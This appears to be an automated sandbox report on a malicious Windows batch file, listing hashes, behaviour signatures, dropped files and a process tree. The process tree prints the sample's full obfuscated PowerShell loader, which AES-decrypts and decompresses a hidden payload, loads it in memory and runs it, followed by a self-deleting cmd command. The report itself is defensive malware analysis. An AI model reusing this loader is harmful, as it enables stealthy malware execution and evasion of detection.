Analysis

  • max time kernel
    90s
  • max time network
    115s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-01-2023 10:37

General

  • Target

    xxicqf.bat

  • Size

    325KB

  • MD5

    4f3c7ff71a35d8abaf90dd0f2353b621

  • SHA1

    b42e3e4ea9ff13c978d1b614f06f2d86735e495d

  • SHA256

    76fc358fa8b3b845ac771bd4dd0746bb49f537ebcf61737e9ee4e5582fdd133a

  • SHA512

    a81106eea5988266fe759d22393b3b5f745c4e27db367ba930913c29c5afe03cac374112c1ec312c2f267d8477eab1e8f2bdf709c28b0a3ef0f90f762cdc982f

  • SSDEEP

    6144:sb0ERTjCC/oq28xqqHBykjjIxEfTKyRfFysWiS3IzZK/DPcAW:sbXjCC/oX8x3HBykjMxsmyRf1UaKTcAW

Score
8/10

Malware Config

Signatures

  • Executes dropped EXE ⋅ 1 IoCs
  • Checks computer location settings ⋅ 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Looks up external IP address via web service ⋅ 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices ⋅ 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry ⋅ 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry ⋅ 2 TTPs 2 IoCs
  • Runs ping.exe ⋅ 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses ⋅ 2 IoCs
  • Suspicious use of AdjustPrivilegeToken ⋅ 1 IoCs
  • Suspicious use of SetWindowsHookEx ⋅ 1 IoCs
  • Suspicious use of WriteProcessMemory ⋅ 16 IoCs
  • Views/modifies file attributes ⋅ 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\xxicqf.bat"
    Suspicious use of WriteProcessMemory
    PID:4324
    • C:\Users\Admin\AppData\Local\Temp\xxicqf.bat.exe
      "xxicqf.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $TaxYb = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\xxicqf.bat').Split([Environment]::NewLine);foreach ($SdoSn in $TaxYb) { if ($SdoSn.StartsWith(':: ')) { $NuzKW = $SdoSn.Substring(3); break; }; };$OHzNm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($NuzKW);$BecaB = New-Object System.Security.Cryptography.AesManaged;$BecaB.Mode = [System.Security.Cryptography.CipherMode]::CBC;$BecaB.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$BecaB.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0LL9z94yl5wYGOKSb2hreL71eR6/82H+3uxqNqN5hfA=');$BecaB.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R3CRmi+qFKdZMzOHEfmfcA==');$EBkLd = $BecaB.CreateDecryptor();$OHzNm = $EBkLd.TransformFinalBlock($OHzNm, 0, $OHzNm.Length);$EBkLd.Dispose();$BecaB.Dispose();$bbcNa = New-Object System.IO.MemoryStream(, $OHzNm);$HkQNi = New-Object System.IO.MemoryStream;$phbxT = New-Object System.IO.Compression.GZipStream($bbcNa, [IO.Compression.CompressionMode]::Decompress);$phbxT.CopyTo($HkQNi);$phbxT.Dispose();$bbcNa.Dispose();$HkQNi.Dispose();$OHzNm = $HkQNi.ToArray();$ZnJXZ = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($OHzNm);$YEeli = $ZnJXZ.EntryPoint;$YEeli.Invoke($null, (, [string[]] ('')))
      Executes dropped EXE
      Checks computer location settings
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:628
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\24hThCDJcd5N.bat" "
        Suspicious use of WriteProcessMemory
        PID:4340
        • C:\Windows\system32\chcp.com
          chcp 65001
          PID:4588
        • C:\Windows\system32\PING.EXE
          ping -n 10 localhost
          Runs ping.exe
          PID:3704
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c choice /c y /n /d y /t 1 & attrib -h -s "C:\Users\Admin\AppData\Local\Temp\xxicqf.bat.exe" & del "C:\Users\Admin\AppData\Local\Temp\xxicqf.bat.exe"
        Suspicious use of WriteProcessMemory
        PID:212
        • C:\Windows\system32\choice.exe
          choice /c y /n /d y /t 1
          PID:4468
        • C:\Windows\system32\attrib.exe
          attrib -h -s "C:\Users\Admin\AppData\Local\Temp\xxicqf.bat.exe"
          Views/modifies file attributes
          PID:2344
      • C:\Windows\system32\wermgr.exe
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "628" "3628" "3532" "2904" "0" "0" "2144" "0" "0" "0" "0" "0"
        Checks processor information in registry
        Enumerates system info in registry
        PID:484

Network

MITRE ATT&CK Matrix

Collection

    Command and Control

      Credential Access

        Execution

          Exfiltration

            Impact

              Initial Access

                Lateral Movement

                  Persistence

                    Privilege Escalation

                      Replay Monitor

                      00:00 00:00

                      Downloads

                      • C:\Users\Admin\AppData\Local\Temp\24hThCDJcd5N.bat
                        Filesize

                        211B

                        MD5

                        39f88ba1ed3e90cab71806a54bd40c7a

                        SHA1

                        75726c444f4630a5a3a046955e41d2bee4f3751f

                        SHA256

                        db29147a00ef147848ea12573b88d772cdfdcee0758c1a14f87d105da7b983aa

                        SHA512

                        31141a2827f1a9572f6dc9e64be1b11587b5fad732c778018e37a15526a9911ae8f20e7f0b494d62cd200fcbed8784ea1e4249e371b5c094dab88b084334efca

                      • C:\Users\Admin\AppData\Local\Temp\xxicqf.bat.exe
                        Filesize

                        442KB

                        MD5

                        04029e121a0cfa5991749937dd22a1d9

                        SHA1

                        f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                        SHA256

                        9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                        SHA512

                        6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                      • C:\Users\Admin\AppData\Local\Temp\xxicqf.bat.exe
                        Filesize

                        442KB

                        MD5

                        04029e121a0cfa5991749937dd22a1d9

                        SHA1

                        f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                        SHA256

                        9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                        SHA512

                        6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                      • memory/212-142-0x0000000000000000-mapping.dmp
                      • memory/484-143-0x0000000000000000-mapping.dmp
                      • memory/628-132-0x0000000000000000-mapping.dmp
                      • memory/628-138-0x000002D8AE780000-0x000002D8AE832000-memory.dmp
                        Filesize

                        712KB

                      • memory/628-139-0x000002D8AEDA0000-0x000002D8AEF62000-memory.dmp
                        Filesize

                        1MB

                      • memory/628-140-0x00007FFC48150000-0x00007FFC48C11000-memory.dmp
                        Filesize

                        10MB

                      • memory/628-137-0x000002D8AE670000-0x000002D8AE6C0000-memory.dmp
                        Filesize

                        320KB

                      • memory/628-134-0x000002D8AE1B0000-0x000002D8AE1D2000-memory.dmp
                        Filesize

                        136KB

                      • memory/628-135-0x00007FFC48150000-0x00007FFC48C11000-memory.dmp
                        Filesize

                        10MB

                      • memory/628-148-0x00007FFC48150000-0x00007FFC48C11000-memory.dmp
                        Filesize

                        10MB

                      • memory/2344-149-0x0000000000000000-mapping.dmp
                      • memory/3704-147-0x0000000000000000-mapping.dmp
                      • memory/4340-141-0x0000000000000000-mapping.dmp
                      • memory/4468-146-0x0000000000000000-mapping.dmp
                      • memory/4588-145-0x0000000000000000-mapping.dmp